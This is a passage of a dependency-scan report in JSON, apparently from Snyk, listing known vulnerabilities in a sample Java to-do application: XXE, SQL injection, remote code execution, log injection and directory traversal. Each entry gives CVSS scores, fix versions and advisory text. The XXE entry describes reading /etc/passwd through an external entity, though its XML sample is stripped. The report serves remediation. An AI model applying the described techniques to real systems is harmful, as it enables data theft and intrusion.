file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - "type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" - ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": 